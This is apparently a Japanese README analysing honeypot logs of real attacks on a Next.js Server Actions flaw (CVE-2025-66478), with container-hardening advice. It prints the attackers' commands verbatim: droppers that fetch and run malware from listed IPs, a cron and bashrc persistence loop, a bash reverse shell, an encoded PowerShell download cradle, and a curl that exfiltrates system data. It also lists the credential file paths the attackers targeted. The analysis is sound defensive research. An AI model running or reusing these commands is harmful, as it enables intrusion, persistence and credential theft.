
CVE-2025-66478(Next.js Server Actions RCE)の実世界の攻撃ログ分析。マルウェアサンプル、攻撃者IP追跡、コンテナセキュリティ強化の教訓を含みます。
このプロジェクトは、インターネット上に公開された Next.js 15.1.2 アプリケーション(Docker コンテナ内で実行)で記録された実際の攻撃ログを収集したものです。これらのログは、CVE-2025-66478 の脆弱性が実戦環境で多数の自動化攻撃ツールによってスキャンされ、悪用されている状況を示しています。
記録期間: 2025-12-04 ~ 2025-12-06(約48時間)
環境情報:
攻撃者は、この脆弱性を利用してマルウェアをダウンロードして実行するコマンドを試みました。
| 攻撃元 IP | 悪意のあるペイロード URL | 説明 |
|---|---|---|
| 216.158.232.43 | http://216.158.232.43:12000/sex.sh | ボットネット/マイニングプログラム |
| 38.207.161.212 | http://38.207.161.212/agent | 悪意のあるエージェントプログラム |
| 43.156.63.124 | http://43.156.63.124/tsd | cron バックドアの埋め込み |
| 154.38.121.219 | res.qiqigece.top/nginx3 | nginx を装ったマルウェア |
| 47.79.42.91 | iot.632313373.xyz/nz.sh | IoT ボットネットスクリプト |
| 47.79.65.237 | sup001.oss-cn-hongkong.aliyuncs.com/python1.sh | マイニング/バックドアプログラム |
| 103.135.101.15 | http://103.135.101.15/wocaosinm.sh | 悪意のあるスクリプト |
| 38.12.24.231 | http://38.12.24.231/kworker | kernel worker を装ったマルウェア |
| 128.199.194.97 | http://128.199.194.97:9001/setup2.sh | 初期化スクリプト |
# 典型的 dropper 攻擊
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a
# 植入 cron 持久化後門
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd
# 複雜的持久化攻擊(嘗試多種下載方式 + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
mkdir -p $d;
if [ -w $d ]; then
p="$d/$n";
(curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
chmod +x $p;
nohup $p >/dev/null 2>&1 &
(crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
fi;
done
攻撃者は、インタラクティブなアクセスを得るためにリバースシェル接続の確立を試みました。
# Bash 反向 shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"
攻撃者はターゲットが Windows システムであると想定し、PowerShell コマンドの実行を試みました。
# Base64 編碼的惡意 PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA
# 解碼後:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')
# 數學計算用於漏洞確認
powershell -c "41*271" # = 11111(特徵碼確認)
powershell -c "44225*41002" # = 1814113450
攻撃者は後続の攻撃に備えてシステム情報の収集を試みました。
# 系統資訊收集並外傳
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`
攻撃者はさまざまな機密ファイルや認証情報の読み取りを試みました。
この脆弱性を介して外部に漏えいしたコンテナ環境変数:
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0
攻撃者は DNS クエリを使用して、データの外部送信や脆弱性の確認を行いました:
ping 5a58e4a0.log.dnslog.pp.ua.
ほとんどの攻撃が失敗したのは、Alpine Linux コンテナの最小限の特性によるものです:
| 欠落しているツール | 影響 |
|---|---|
curl | 悪意のあるペイロードをダウンロードできない |
bash | bash 固有の構文(リバースシェルなど)を実行できない |
powershell | Windows 攻撃が無効 |
wget は利用可能ですが、一部の悪意のあるスクリプトは内部で依然として curl または bash に依存しているため、実行に失敗します。
ログには多数の Base64 エンコードデータが含まれており、以下はその一部のデコード結果です:
# digest: 'cm9vdAo='
解碼: root
# digest: 'dGVzdAo='
解碼: test
# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
解碼: vulnerability_test
# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
解碼: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
# /tmp 目錄內容
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==
解碼:
total 20
drwxrwxrwt 1 root root 4096 Dec 5 18:00 .
drwxr-xr-x 1 root root 4096 Dec 4 13:36 ..
-rwxr-xr-x 1 root root 9848 Dec 5 18:00 INSTALL
以下は、記録された攻撃元 IP アドレスです:
攻撃者は存在しない Server Action の呼び出しを試みました:
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"
攻撃者はエラーメッセージ内の digest フィールドを利用してデータを外部に漏えいさせました:
Error: x
digest: 'cm9vdAo=' // Base64 編碼的 'root'
curl, bash, python など、悪用される可能性のあるツールをインストールしない--read-only でコンテナを実行するこのプロジェクトは、セキュリティ教育および研究目的のみを対象としています。記録された攻撃はすべて、研究用ハニーポットに対する実際の攻撃試行です。この情報を違法な目的で使用しないでください。
このプロジェクトには、攻撃ログから抽出・ダウンロードされた実際のマルウェアサンプルが含まれています。詳細な分析については、以下を参照してください:
MIT License
| カテゴリ | パス |
|---|
| クラウド認証情報 | /root/.aws/credentials, /root/.aws/config |
/root/.config/gcloud/credentials.db | |
/root/.config/gcloud/application_default_credentials | |
| SSH キー | /root/.ssh/id_rsa, /root/.ssh/config |
| Git 認証情報 | /root/.git-credentials, /root/.gitconfig |
| コンテナ/K8s | /root/.docker/config, /root/.kube/config |
/var/lib/kubelet/config.yaml | |
| アプリケーション | /proc/self/cwd/serviceAccountKey.json(Firebase) |
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma | |
| シェル履歴 | /root/.bash_history, /root/.zsh_history |
| クラウドツール | /root/.ossutilconfig(Alibaba Cloud OSS) |
/root/.npmrc | |
| システム設定 | /etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow |
python | Python ダウンローダーを使用できない |
| IP アドレス | 国/地域(推測) | 攻撃タイプ |
|---|
| 216.158.232.43 | アメリカ | Dropper |
| 38.165.44.205 | アメリカ | Dropper |
| 23.95.44.80 | アメリカ | Dropper |
| 154.38.121.219 | 香港 | マルウェア(nginx3) |
| 38.207.161.212 | アメリカ | Agent |
| 43.156.63.124 | 中国 | Cron バックドア |
| 47.79.42.91 | 中国(Alibaba Cloud) | IoT ボットネット |
| 47.79.65.237 | 中国(Alibaba Cloud) | マイニングプログラム |
| 119.45.243.154 | 中国(Tencent Cloud) | マイニングプログラム |
| 144.22.210.54 | ブラジル | Dropper |
| 217.60.249.228 | スウェーデン | Dropper |
| 154.26.192.32 | アメリカ | リバースシェル |
| 156.234.209.103 | 不明 | PowerShell ペイロード |
| 38.60.212.106 | アメリカ | 情報収集 |
| 103.135.101.15 | ベトナム | ボットネット |
| 128.199.194.97 | シンガポール(DigitalOcean) | セットアップスクリプト |
| 38.12.24.231 | アメリカ | 永続化マルウェア |
| ファイル | タイプ | サイズ | ソース | 脅威レベル |
|---|
| nz.sh | シェルスクリプト | 931 B | iot.632313373.xyz | 中 |
| tsd.sh | シェルスクリプト | 1.7 KB | 43.156.63.124 | 高 |
| tsd | ELF 64-bit | 6.8 MB | 43.156.63.124 | 高 |
| init.sh | シェルスクリプト | 6.1 KB | AWS S3 | 重大 |
| agent | ELF 64-bit | 23.7 MB | AWS S3 | 重大 |
| Agtisx.exe | PE32+ (Windows) | 24.0 MB | AWS S3 | 重大 |